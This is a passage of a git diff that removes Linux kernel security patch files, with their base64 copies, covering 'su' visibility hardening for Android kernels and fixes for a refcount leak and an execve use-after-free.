-+ return dentry->d_name.len == 2 && !memcmp(dentry->d_name.name, "su", 2);
-+}
-+
- extern int sysctl_vfs_cache_pressure;
-
- #endif /* __LINUX_DCACHE_H */
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index 28f14d2..17962ef 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -93,6 +93,12 @@
-
- #include
-
-+int su_instances(void);
-+bool su_running(void);
-+bool su_visible(void);
-+void su_exec(void);
-+void su_exit(void);
-+
- struct exec_domain;
- struct futex_pi_state;
- struct robust_list_head;
-@@ -2008,6 +2014,8 @@
- TASK_PFA_SET(SPREAD_SLAB, spread_slab)
- TASK_PFA_CLEAR(SPREAD_SLAB, spread_slab)
-
-+#define PF_SU 0x10000000 /* task is su */
-+
- /*
- * Do not use outside of architecture code which knows its limitations.
- *
-diff --git a/kernel/exit.c b/kernel/exit.c
-index f28427b..3eafd26 100644
---- a/kernel/exit.c
-+++ b/kernel/exit.c
-@@ -957,6 +957,11 @@
- }
-
- exit_signals(tsk); /* sets PF_EXITING */
-+
-+ if (tsk->flags & PF_SU) {
-+ su_exit();
-+ }
-+
- /*
- * tsk->flags are checked in the futex code to protect against
- * an exiting task cleaning up the robust pi futexes.
-diff --git a/kernel/fork.c b/kernel/fork.c
-index 75dc3dd..23695d2 100644
---- a/kernel/fork.c
-+++ b/kernel/fork.c
-@@ -295,6 +295,8 @@
- if (err)
- goto out;
-
-+ tsk->flags &= ~PF_SU;
-+
- tsk->stack = ti;
- #ifdef CONFIG_SECCOMP
- /*
-diff --git a/kernel/sched/core.c b/kernel/sched/core.c
-index 5c06094..04fa21e 100644
---- a/kernel/sched/core.c
-+++ b/kernel/sched/core.c
-@@ -89,6 +89,38 @@
- #define CREATE_TRACE_POINTS
- #include
-
-+static atomic_t __su_instances;
-+
-+int su_instances(void)
-+{
-+ return atomic_read(&__su_instances);
-+}
-+
-+bool su_running(void)
-+{
-+ return su_instances() > 0;
-+}
-+
-+bool su_visible(void)
-+{
-+ uid_t uid = current_uid();
-+ if (su_running())
-+ return true;
-+ if (uid == 0 || uid == 1000)
-+ return true;
-+ return false;
-+}
-+
-+void su_exec(void)
-+{
-+ atomic_inc(&__su_instances);
-+}
-+
-+void su_exit(void)
-+{
-+ atomic_dec(&__su_instances);
-+}
-+
- ATOMIC_NOTIFIER_HEAD(migration_notifier_head);
-
- void start_bandwidth_timer(struct hrtimer *period_timer, ktime_t period)
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.4/0002.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0001/3.4/0002.patch.base64
deleted file mode 100644
index a35dda38..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.4/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@ -RnJvbSA3MGNmYmZkYTAwNzFiMTYxNjBiODI4MzVhNzU3ZWJlY2QxNGRjNDhiIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBUb20gTWFyc2hhbGwgPHRkbS5jb2RlQGdtYWlsLmNvbT4KRGF0ZTogRnJpLCAyOCBBcHIgMjAxNyAyMjo0NjozNyArMDAwMApTdWJqZWN0OiBbUEFUQ0hdIGtlcm5lbDogT25seSBleHBvc2Ugc3Ugd2hlbiBkYWVtb24gaXMgcnVubmluZwoKTm90ZTogdGhpcyBpcyBmb3IgdGhlIDMuNCBrZXJuZWwgYW5kIGxhY2tzIHRoZSByZWFkLW9ubHkgbW91bnQgcG9pbnQKbG9naWMgZHVlIHRvIHRoZSBub24tZXh0ZW5zaWJsZSByZWFkZGlyIGltcGxlbWVudGF0aW9uLgoKSXQgaGFzIGJlZW4gY2xhaW1lZCB0aGF0IHRoZSBQRyBpbXBsZW1lbnRhdGlvbiBvZiAnc3UnIGhhcyBzZWN1cml0eQp2dWxuZXJhYmlsaXRpZXMgZXZlbiB3aGVuIGRpc2FibGVkLiAgVW5mb3J0dW5hdGVseSwgdGhlIHBlb3BsZSB0aGF0CmZpbmQgdGhlc2UgdnVsbmVyYWJpbGl0aWVzIG9mdGVuIGxpa2UgdG8ga2VlcCB0aGVtIHByaXZhdGUgc28gdGhleQpjYW4gcHJvZml0IGZyb20gZXhwbG9pdHMgd2hpbGUgbGVhdmluZyB1c2VycyBleHBvc2VkIHRvIG1hbGljaW91cwpoYWNrZXJzLgoKSW4gb3JkZXIgdG8gcmVkdWNlIHRoZSBhdHRhY2sgc3VyZmFjZSBmb3IgdnVsbmVyYWJpbGl0ZXMsIGl0IGlzCnRoZXJlZm9yZSBuZWNlc3NhcnkgdG8gbWFrZSAnc3UnIGNvbXBsZXRlbHkgaW5hY2Nlc3NpYmxlIHdoZW4gaXQKaXMgbm90IGluIHVzZSAoZXhjZXB0IGJ5IHRoZSByb290IGFuZCBzeXN0ZW0gdXNlcnMpLgoKQ2hhbmdlLUlkOiBJYTdkNTBiYTQ2YzNkOTMyYzJiMGNhNWZjOGU5ZWM2OWVjOTA0NWY4NQotLS0KCmRpZmYgLS1naXQgYS9mcy9leGVjLmMgYi9mcy9leGVjLmMKaW5kZXggYTRkMDVjZS4uYjhjOWFmMCAxMDA2NDQKLS0tIGEvZnMvZXhlYy5jCisrKyBiL2ZzL2V4ZWMuYwpAQCAtMTU5MSw2ICsxNTkxLDExIEBACiAJaWYgKHJldHZhbCA8IDApCiAJCWdvdG8gb3V0OwogCisJaWYgKGNhcGFibGUoQ0FQX1NZU19BRE1JTikgJiYgZF9pc19zdShmaWxlLT5mX2RlbnRyeSkpIHsKKwkJY3VycmVudC0+ZmxhZ3MgfD0gUEZfU1U7CisJCXN1X2V4ZWMoKTsKKwl9CisKIAkvKiBleGVjdmUgc3VjY2VlZGVkICovCiAJY3VycmVudC0+ZnMtPmluX2V4ZWMgPSAwOwogCWN1cnJlbnQtPmluX2V4ZWN2ZSA9IDA7CmRpZmYgLS1naXQgYS9mcy9uYW1laS5jIGIvZnMvbmFtZWkuYwppbmRleCBkZjEyYjU3Li4wNDQ2NDY5IDEwMDY0NAotLS0gYS9mcy9uYW1laS5jCisrKyBiL2ZzL25hbWVpLmMKQEAgLTE4MDAsNiArMTgwMCwxMSBAQAogCQl9CiAJfQogCisJaWYgKCFlcnIpIHsKKwkJaWYgKGRfaXNfc3UobmQtPnBhdGguZGVudHJ5KSAmJiAhc3VfdmlzaWJsZSgpKQorCQkJZXJyID0gLUVOT0VOVDsKKwl9CisKIAlpZiAoYmFzZSkKIAkJZnB1dChiYXNlKTsKIApkaWZmIC0tZ2l0IGEvZnMvcmVhZGRpci5jIGIvZnMvcmVhZGRpc
i5jCmluZGV4IGNjMGE4MjIuLjEwNmYxNTYgMTAwNjQ0Ci0tLSBhL2ZzL3JlYWRkaXIuYworKysgYi9mcy9yZWFkZGlyLmMKQEAgLTQ3LDYgKzQ3LDE0IEBACiAKIEVYUE9SVF9TWU1CT0wodmZzX3JlYWRkaXIpOwogCitzdGF0aWMgYm9vbCBoaWRlX25hbWUoY29uc3QgY2hhciAqbmFtZSwgaW50IG5hbWxlbikKK3sKKwlpZiAobmFtbGVuID09IDIgJiYgIW1lbWNtcChuYW1lLCAic3UiLCAyKSkKKwkJaWYgKCFzdV92aXNpYmxlKCkpCisJCQlyZXR1cm4gdHJ1ZTsKKwlyZXR1cm4gZmFsc2U7Cit9CisKIC8qCiAgKiBUcmFkaXRpb25hbCBsaW51eCByZWFkZGlyKCkgaGFuZGxpbmcuLgogICoKQEAgLTg0LDYgKzkyLDggQEAKIAkJYnVmLT5yZXN1bHQgPSAtRU9WRVJGTE9XOwogCQlyZXR1cm4gLUVPVkVSRkxPVzsKIAl9CisJaWYgKGhpZGVfbmFtZShuYW1lLCBuYW1sZW4pKQorCQlyZXR1cm4gMDsKIAlidWYtPnJlc3VsdCsrOwogCWRpcmVudCA9IGJ1Zi0+ZGlyZW50OwogCWlmICghYWNjZXNzX29rKFZFUklGWV9XUklURSwgZGlyZW50LApAQCAtMTYzLDYgKzE3Myw4IEBACiAJCWJ1Zi0+ZXJyb3IgPSAtRU9WRVJGTE9XOwogCQlyZXR1cm4gLUVPVkVSRkxPVzsKIAl9CisJaWYgKGhpZGVfbmFtZShuYW1lLCBuYW1sZW4pKQorCQlyZXR1cm4gMDsKIAlkaXJlbnQgPSBidWYtPnByZXZpb3VzOwogCWlmIChkaXJlbnQpIHsKIAkJaWYgKF9fcHV0X3VzZXIob2Zmc2V0LCAmZGlyZW50LT5kX29mZikpCkBAIC0yNDQsNiArMjU2LDggQEAKIAlidWYtPmVycm9yID0gLUVJTlZBTDsJLyogb25seSB1c2VkIGlmIHdlIGZhaWwuLiAqLwogCWlmIChyZWNsZW4gPiBidWYtPmNvdW50KQogCQlyZXR1cm4gLUVJTlZBTDsKKwlpZiAoaGlkZV9uYW1lKG5hbWUsIG5hbWxlbikpCisJCXJldHVybiAwOwogCWRpcmVudCA9IGJ1Zi0+cHJldmlvdXM7CiAJaWYgKGRpcmVudCkgewogCQlpZiAoX19wdXRfdXNlcihvZmZzZXQsICZkaXJlbnQtPmRfb2ZmKSkKZGlmZiAtLWdpdCBhL2luY2x1ZGUvbGludXgvZGNhY2hlLmggYi9pbmNsdWRlL2xpbnV4L2RjYWNoZS5oCmluZGV4IDkyZTlkMTkuLjEzZWZlMzggMTAwNjQ0Ci0tLSBhL2luY2x1ZGUvbGludXgvZGNhY2hlLmgKKysrIGIvaW5jbHVkZS9saW51eC9kY2FjaGUuaApAQCAtNDAzLDYgKzQwMywxMSBAQAogCiBleHRlcm4gdm9pZCBkX2NsZWFyX25lZWRfbG9va3VwKHN0cnVjdCBkZW50cnkgKmRlbnRyeSk7CiAKK3N0YXRpYyBpbmxpbmUgYm9vbCBkX2lzX3N1KGNvbnN0IHN0cnVjdCBkZW50cnkgKmRlbnRyeSkKK3sKKwlyZXR1cm4gZGVudHJ5LT5kX25hbWUubGVuID09IDIgJiYgIW1lbWNtcChkZW50cnktPmRfbmFtZS5uYW1lLCAic3UiLCAyKTsKK30KKwogZXh0ZXJuIGludCBzeXNjdGxfdmZzX2NhY2hlX3ByZXNzdXJlOwogCiAjZW5kaWYJLyogX19MSU5VWF9EQ0FDSEVfSCAqLwpkaWZmIC0tZ2l0IGEvaW5jbHVkZS9saW51eC9zY2hlZC5oIGIvaW5jbHVkZS9saW51eC9zY2hlZC5oCmluZGV4IDI4ZjE0ZDIuL
jE3OTYyZWYgMTAwNjQ0Ci0tLSBhL2luY2x1ZGUvbGludXgvc2NoZWQuaAorKysgYi9pbmNsdWRlL2xpbnV4L3NjaGVkLmgKQEAgLTkzLDYgKzkzLDEyIEBACiAKICNpbmNsdWRlIDxhc20vcHJvY2Vzc29yLmg+CiAKK2ludCAgc3VfaW5zdGFuY2VzKHZvaWQpOworYm9vbCBzdV9ydW5uaW5nKHZvaWQpOworYm9vbCBzdV92aXNpYmxlKHZvaWQpOwordm9pZCBzdV9leGVjKHZvaWQpOwordm9pZCBzdV9leGl0KHZvaWQpOworCiBzdHJ1Y3QgZXhlY19kb21haW47CiBzdHJ1Y3QgZnV0ZXhfcGlfc3RhdGU7CiBzdHJ1Y3Qgcm9idXN0X2xpc3RfaGVhZDsKQEAgLTIwMDgsNiArMjAxNCw4IEBACiBUQVNLX1BGQV9TRVQoU1BSRUFEX1NMQUIsIHNwcmVhZF9zbGFiKQogVEFTS19QRkFfQ0xFQVIoU1BSRUFEX1NMQUIsIHNwcmVhZF9zbGFiKQogCisjZGVmaW5lIFBGX1NVCQkweDEwMDAwMDAwICAgICAgLyogdGFzayBpcyBzdSAqLworCiAvKgogICogRG8gbm90IHVzZSBvdXRzaWRlIG9mIGFyY2hpdGVjdHVyZSBjb2RlIHdoaWNoIGtub3dzIGl0cyBsaW1pdGF0aW9ucy4KICAqCmRpZmYgLS1naXQgYS9rZXJuZWwvZXhpdC5jIGIva2VybmVsL2V4aXQuYwppbmRleCBmMjg0MjdiLi4zZWFmZDI2IDEwMDY0NAotLS0gYS9rZXJuZWwvZXhpdC5jCisrKyBiL2tlcm5lbC9leGl0LmMKQEAgLTk1Nyw2ICs5NTcsMTEgQEAKIAl9CiAKIAlleGl0X3NpZ25hbHModHNrKTsgIC8qIHNldHMgUEZfRVhJVElORyAqLworCisJaWYgKHRzay0+ZmxhZ3MgJiBQRl9TVSkgeworCQlzdV9leGl0KCk7CisJfQorCiAJLyoKIAkgKiB0c2stPmZsYWdzIGFyZSBjaGVja2VkIGluIHRoZSBmdXRleCBjb2RlIHRvIHByb3RlY3QgYWdhaW5zdAogCSAqIGFuIGV4aXRpbmcgdGFzayBjbGVhbmluZyB1cCB0aGUgcm9idXN0IHBpIGZ1dGV4ZXMuCmRpZmYgLS1naXQgYS9rZXJuZWwvZm9yay5jIGIva2VybmVsL2ZvcmsuYwppbmRleCA3NWRjM2RkLi4yMzY5NWQyIDEwMDY0NAotLS0gYS9rZXJuZWwvZm9yay5jCisrKyBiL2tlcm5lbC9mb3JrLmMKQEAgLTI5NSw2ICsyOTUsOCBAQAogCWlmIChlcnIpCiAJCWdvdG8gb3V0OwogCisJdHNrLT5mbGFncyAmPSB+UEZfU1U7CisKIAl0c2stPnN0YWNrID0gdGk7CiAjaWZkZWYgQ09ORklHX1NFQ0NPTVAKIAkvKgpkaWZmIC0tZ2l0IGEva2VybmVsL3NjaGVkL2NvcmUuYyBiL2tlcm5lbC9zY2hlZC9jb3JlLmMKaW5kZXggNWMwNjA5NC4uMDRmYTIxZSAxMDA2NDQKLS0tIGEva2VybmVsL3NjaGVkL2NvcmUuYworKysgYi9rZXJuZWwvc2NoZWQvY29yZS5jCkBAIC04OSw2ICs4OSwzOCBAQAogI2RlZmluZSBDUkVBVEVfVFJBQ0VfUE9JTlRTCiAjaW5jbHVkZSA8dHJhY2UvZXZlbnRzL3NjaGVkLmg+CiAKK3N0YXRpYyBhdG9taWNfdCBfX3N1X2luc3RhbmNlczsKKworaW50IHN1X2luc3RhbmNlcyh2b2lkKQoreworCXJldHVybiBhdG9taWNfcmVhZCgmX19zdV9pbnN0YW5jZXMpOworfQorCitib29sIHN1X3J1bm5pbmcodm9pZCkKK3sKKwlyZXR1c
m4gc3VfaW5zdGFuY2VzKCkgPiAwOworfQorCitib29sIHN1X3Zpc2libGUodm9pZCkKK3sKKwl1aWRfdCB1aWQgPSBjdXJyZW50X3VpZCgpOworCWlmIChzdV9ydW5uaW5nKCkpCisJCXJldHVybiB0cnVlOworCWlmICh1aWQgPT0gMCB8fCB1aWQgPT0gMTAwMCkKKwkJcmV0dXJuIHRydWU7CisJcmV0dXJuIGZhbHNlOworfQorCit2b2lkIHN1X2V4ZWModm9pZCkKK3sKKwlhdG9taWNfaW5jKCZfX3N1X2luc3RhbmNlcyk7Cit9CisKK3ZvaWQgc3VfZXhpdCh2b2lkKQoreworCWF0b21pY19kZWMoJl9fc3VfaW5zdGFuY2VzKTsKK30KKwogQVRPTUlDX05PVElGSUVSX0hFQUQobWlncmF0aW9uX25vdGlmaWVyX2hlYWQpOwogCiB2b2lkIHN0YXJ0X2JhbmR3aWR0aF90aW1lcihzdHJ1Y3QgaHJ0aW1lciAqcGVyaW9kX3RpbWVyLCBrdGltZV90IHBlcmlvZCkK \ No newline at end of file diff --git a/Patches/Linux_CVEs/LVT-2017-0002/3.10/0002.patch b/Patches/Linux_CVEs/LVT-2017-0002/3.10/0002.patch deleted file mode 100644 index 37fda035..00000000 --- a/Patches/Linux_CVEs/LVT-2017-0002/3.10/0002.patch +++ /dev/null @@ -1,24 +0,0 @@ -From fd494b5a4da5dc2e332b8b7480960509046c7b2e Mon Sep 17 00:00:00 2001 -From: Tom Marshall -Date: Fri, 19 May 2017 18:24:04 +0000 -Subject: [PATCH] kernel: Fix potential refcount leak in su check - -Change-Id: I7e1ecb78bfc951bf645a1462988dcd93c4247a9b ---- - -diff --git a/fs/namei.c b/fs/namei.c -index a52456c..404b61c 100644 ---- a/fs/namei.c -+++ b/fs/namei.c -@@ -2003,8 +2003,10 @@ - if (!err) { - struct super_block *sb = nd->inode->i_sb; - if (sb->s_flags & MS_RDONLY) { -- if (d_is_su(nd->path.dentry) && !su_visible()) -+ if (d_is_su(nd->path.dentry) && !su_visible()) { -+ path_put(&nd->path); - err = -ENOENT; -+ } - } - } - diff --git a/Patches/Linux_CVEs/LVT-2017-0002/3.10/0002.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0002/3.10/0002.patch.base64 deleted file mode 100644 index a5ef0584..00000000 --- a/Patches/Linux_CVEs/LVT-2017-0002/3.10/0002.patch.base64 +++ /dev/null 
@@ -1 +0,0 @@ -RnJvbSBmZDQ5NGI1YTRkYTVkYzJlMzMyYjhiNzQ4MDk2MDUwOTA0NmM3YjJlIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBUb20gTWFyc2hhbGwgPHRkbS5jb2RlQGdtYWlsLmNvbT4KRGF0ZTogRnJpLCAxOSBNYXkgMjAxNyAxODoyNDowNCArMDAwMApTdWJqZWN0OiBbUEFUQ0hdIGtlcm5lbDogRml4IHBvdGVudGlhbCByZWZjb3VudCBsZWFrIGluIHN1IGNoZWNrCgpDaGFuZ2UtSWQ6IEk3ZTFlY2I3OGJmYzk1MWJmNjQ1YTE0NjI5ODhkY2Q5M2M0MjQ3YTliCi0tLQoKZGlmZiAtLWdpdCBhL2ZzL25hbWVpLmMgYi9mcy9uYW1laS5jCmluZGV4IGE1MjQ1NmMuLjQwNGI2MWMgMTAwNjQ0Ci0tLSBhL2ZzL25hbWVpLmMKKysrIGIvZnMvbmFtZWkuYwpAQCAtMjAwMyw4ICsyMDAzLDEwIEBACiAJaWYgKCFlcnIpIHsKIAkJc3RydWN0IHN1cGVyX2Jsb2NrICpzYiA9IG5kLT5pbm9kZS0+aV9zYjsKIAkJaWYgKHNiLT5zX2ZsYWdzICYgTVNfUkRPTkxZKSB7Ci0JCQlpZiAoZF9pc19zdShuZC0+cGF0aC5kZW50cnkpICYmICFzdV92aXNpYmxlKCkpCisJCQlpZiAoZF9pc19zdShuZC0+cGF0aC5kZW50cnkpICYmICFzdV92aXNpYmxlKCkpIHsKKwkJCQlwYXRoX3B1dCgmbmQtPnBhdGgpOwogCQkJCWVyciA9IC1FTk9FTlQ7CisJCQl9CiAJCX0KIAl9CiAK \ No newline at end of file diff --git a/Patches/Linux_CVEs/LVT-2017-0002/3.18/0003.patch b/Patches/Linux_CVEs/LVT-2017-0002/3.18/0003.patch deleted file mode 100644 index a78a9950..00000000 --- a/Patches/Linux_CVEs/LVT-2017-0002/3.18/0003.patch +++ /dev/null @@ -1,24 +0,0 @@ -From 3a4bd3fb9eb3db4ccb8103ba37ea5082836dba36 Mon Sep 17 00:00:00 2001 -From: Tom Marshall -Date: Thu, 18 May 2017 23:50:22 +0000 -Subject: [PATCH] kernel: Fix potential refcount leak in su check - -Change-Id: I8d2c8bed65a01eb0928308df638a04449a5bd881 ---- - -diff --git a/fs/namei.c b/fs/namei.c -index e07a2dc..f588830 100644 ---- a/fs/namei.c -+++ b/fs/namei.c -@@ -2028,8 +2028,10 @@ - if (!err) { - struct super_block *sb = nd->inode->i_sb; - if (sb->s_flags & MS_RDONLY) { -- if (d_is_su(nd->path.dentry) && !su_visible()) -+ if (d_is_su(nd->path.dentry) && !su_visible()) { -+ path_put(&nd->path); - err = -ENOENT; -+ } - } - } - diff --git a/Patches/Linux_CVEs/LVT-2017-0002/3.18/0003.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0002/3.18/0003.patch.base64 deleted file mode 100644 index bec6be8b..00000000 
--- a/Patches/Linux_CVEs/LVT-2017-0002/3.18/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0002/3.4/0001.patch b/Patches/Linux_CVEs/LVT-2017-0002/3.4/0001.patch
deleted file mode 100644
index 7339ec8b..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0002/3.4/0001.patch
+++ /dev/null
@@ -1,24 +0,0 @@
-From 0f29566b5fad388cc4a07402f9651d86f1fe2b45 Mon Sep 17 00:00:00 2001
-From: Tom Marshall
-Date: Fri, 19 May 2017 18:24:49 +0000
-Subject: [PATCH] kernel: Fix potential refcount leak in su check
-
-Change-Id: I3d241ae805ba708c18bccfd5e5d6cdcc8a5bc1c8
----
-
-diff --git a/fs/namei.c b/fs/namei.c
-index 414fc51..689339e 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -1803,8 +1803,10 @@
- if (!err) {
- struct super_block *sb = nd->inode->i_sb;
- if (sb->s_flags & MS_RDONLY) {
-- if (d_is_su(nd->path.dentry) && !su_visible())
-+ if (d_is_su(nd->path.dentry) && !su_visible()) {
-+ path_put(&nd->path);
- err = -ENOENT;
-+ }
- }
- }
-
diff --git a/Patches/Linux_CVEs/LVT-2017-0002/3.4/0001.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0002/3.4/0001.patch.base64
deleted file mode 100644
index 5f3cf1a0..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0002/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0003/3.10/0001.patch b/Patches/Linux_CVEs/LVT-2017-0003/3.10/0001.patch
deleted file mode 100644
index acc38862..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0003/3.10/0001.patch
+++ /dev/null
@@ -1,26 +0,0 @@
-From 984ee30b63ad26f934cb67ef280200fc161583c1 Mon Sep 17 00:00:00 2001
-From: Alberto97
-Date: Tue, 23 May 2017 21:47:00 +0200
-Subject: [PATCH] Fix "hide su" patch for 3.10
-
-Without this, "ls system/xbin" returns "ls: system/xbin/su: No such file or directory"
-if root is disabled in Developer Settings.
-This happens because EXT4 uses "readdir" instead of "iterate".
-3.18 kernel, instead, unconditionally goes for the "iterate" way here
-and that explains why I'm not seeing this error there.
-
-Change-Id: I26426683df0fd199a80f053294f352e31754bec5
----
-
-diff --git a/fs/readdir.c b/fs/readdir.c
-index d52d18d..e1b7e19 100644
---- a/fs/readdir.c
-+++ b/fs/readdir.c
-@@ -43,6 +43,7 @@
- res = file->f_op->iterate(file, ctx);
- file->f_pos = ctx->pos;
- } else {
-+ ctx->romnt = (inode->i_sb->s_flags & MS_RDONLY);
- res = file->f_op->readdir(file, ctx, ctx->actor);
- ctx->pos = file->f_pos;
- }
diff --git a/Patches/Linux_CVEs/LVT-2017-0003/3.10/0001.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0003/3.10/0001.patch.base64
deleted file mode 100644
index fdb05285..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0003/3.10/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0004/3.10/0002.patch b/Patches/Linux_CVEs/LVT-2017-0004/3.10/0002.patch
deleted file mode 100644
index ec67f66e..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0004/3.10/0002.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 9b854303a58e8e0f4d9c40010fc88d5c280706d9 Mon Sep 17 00:00:00 2001
-From: Andrea Arcangeli
-Date: Tue, 25 Jul 2017 22:22:45 +0200
-Subject: [PATCH] fs/exec: fix use after free in execve
-
-"file" can be already freed if bprm->file is NULL after
-search_binary_handler() return. binfmt_script will do exactly that for
-example. If the VM reuses the file after fput run(), this will result in
-a use ater free.
-
-So obtain d_is_su before search_binary_handler() runs.
-
-This should explain this crash:
-
-[25333.009554] Unable to handle kernel NULL pointer dereference at virtual address 00000185
-[..]
-[25333.009918] [2: am:21861] PC is at do_execve+0x354/0x474
-
-Change-Id: I2a8a814d1c0aa75625be83cb30432cf13f1a0681
-Signed-off-by: Kevin F. Haggerty
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 0ca8cba..c98c680 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1490,6 +1490,7 @@
- bool clear_in_exec;
- int retval;
- const struct cred *cred = current_cred();
-+ bool is_su;
-
- /*
- * We move the actual failure in case of RLIMIT_NPROC excess from
-@@ -1566,11 +1567,14 @@
- if (retval < 0)
- goto out;
-
-+ /* search_binary_handler can release file and it may be freed */
-+ is_su = d_is_su(file->f_dentry);
-+
- retval = search_binary_handler(bprm);
- if (retval < 0)
- goto out;
-
-- if (d_is_su(file->f_dentry) && capable(CAP_SYS_ADMIN)) {
-+ if (is_su && capable(CAP_SYS_ADMIN)) {
- current->flags |= PF_SU;
- su_exec();
- }
diff --git a/Patches/Linux_CVEs/LVT-2017-0004/3.10/0002.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0004/3.10/0002.patch.base64
deleted file mode 100644
index 52b53994..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0004/3.10/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0004/3.18/0003.patch b/Patches/Linux_CVEs/LVT-2017-0004/3.18/0003.patch
deleted file mode 100644
index 67b5cbd0..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0004/3.18/0003.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 988e4530c2ce74a789c7cba210520d78b9a10132 Mon Sep 17 00:00:00 2001
-From: Andrea Arcangeli
-Date: Tue, 25 Jul 2017 22:22:45 +0200
-Subject: [PATCH] fs/exec: fix use after free in execve
-
-"file" can be already freed if bprm->file is NULL after
-exec_binprm() return. binfmt_script will do exactly that for
-example. If the VM reuses the file after fput run(), this will result in
-a use ater free.
-
-So obtain d_is_su before exec_binprm() runs.
-
-This should explain this crash:
-
-[25333.009554] Unable to handle kernel NULL pointer dereference at virtual address 00000185
-[..]
-[25333.009918] [2: am:21861] PC is at do_execve+0x354/0x474
-
-Change-Id: I2a8a814d1c0aa75625be83cb30432cf13f1a0681
-Signed-off-by: Kevin F. Haggerty
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 1838704..69b0dbd 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1458,6 +1458,7 @@
- struct file *file;
- struct files_struct *displaced;
- int retval;
-+ bool is_su;
-
- if (IS_ERR(filename))
- return PTR_ERR(filename);
-@@ -1533,11 +1534,14 @@
- if (retval < 0)
- goto out;
-
-+ /* search_binary_handler can release file and it may be freed */
-+ is_su = d_is_su(file->f_dentry);
-+
- retval = exec_binprm(bprm);
- if (retval < 0)
- goto out;
-
-- if (d_is_su(file->f_dentry) && capable(CAP_SYS_ADMIN)) {
-+ if (is_su && capable(CAP_SYS_ADMIN)) {
- current->flags |= PF_SU;
- su_exec();
- }
diff --git a/Patches/Linux_CVEs/LVT-2017-0004/3.18/0003.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0004/3.18/0003.patch.base64
deleted file mode 100644
index 90170977..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0004/3.18/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0004/3.4/0001.patch b/Patches/Linux_CVEs/LVT-2017-0004/3.4/0001.patch
deleted file mode 100644
index 10acfdee..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0004/3.4/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From be1421e7f5948f7c9f7ff351ec47c19da7498686 Mon Sep 17 00:00:00 2001
-From: Andrea Arcangeli
-Date: Tue, 25 Jul 2017 22:22:45 +0200
-Subject: [PATCH] fs/exec: fix use after free in execve
-
-"file" can be already freed if bprm->file is NULL after
-search_binary_handler() return. binfmt_script will do exactly that for
-example. If the VM reuses the file after fput run(), this will result in
-a use ater free.
-
-So obtain d_is_su before search_binary_handler() runs.
-
-This should explain this crash:
-
-[25333.009554] Unable to handle kernel NULL pointer dereference at virtual address 00000185
-[..]
-[25333.009918] [2: am:21861] PC is at do_execve+0x354/0x474
-
-Change-Id: I2a8a814d1c0aa75625be83cb30432cf13f1a0681
-Signed-off-by: Kevin F. Haggerty
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 73e9bd4..5d2a2f0 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1511,6 +1511,7 @@
- bool clear_in_exec;
- int retval;
- const struct cred *cred = current_cred();
-+ bool is_su;
-
- /*
- * We move the actual failure in case of RLIMIT_NPROC excess from
-@@ -1587,11 +1588,14 @@
- if (retval < 0)
- goto out;
-
-+ /* search_binary_handler can release file and it may be freed */
-+ is_su = d_is_su(file->f_dentry);
-+
- retval = search_binary_handler(bprm,regs);
- if (retval < 0)
- goto out;
-
-- if (d_is_su(file->f_dentry) && capable(CAP_SYS_ADMIN)) {
-+ if (is_su && capable(CAP_SYS_ADMIN)) {
- current->flags |= PF_SU;
- su_exec();
- }
diff --git a/Patches/Linux_CVEs/LVT-2017-0004/3.4/0001.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0004/3.4/0001.patch.base64
deleted file mode 100644
index 01239c3d..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0004/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/Untracked/ANY/0002-ozwpan-Use-unsigned-ints-to-prevent-heap-overflow.patch b/Patches/Linux_CVEs/Untracked/ANY/0002-ozwpan-Use-unsigned-ints-to-prevent-heap-overflow.patch
deleted file mode 100644
index ddffcaeb..00000000
--- a/Patches/Linux_CVEs/Untracked/ANY/0002-ozwpan-Use-unsigned-ints-to-prevent-heap-overflow.patch
+++ /dev/null
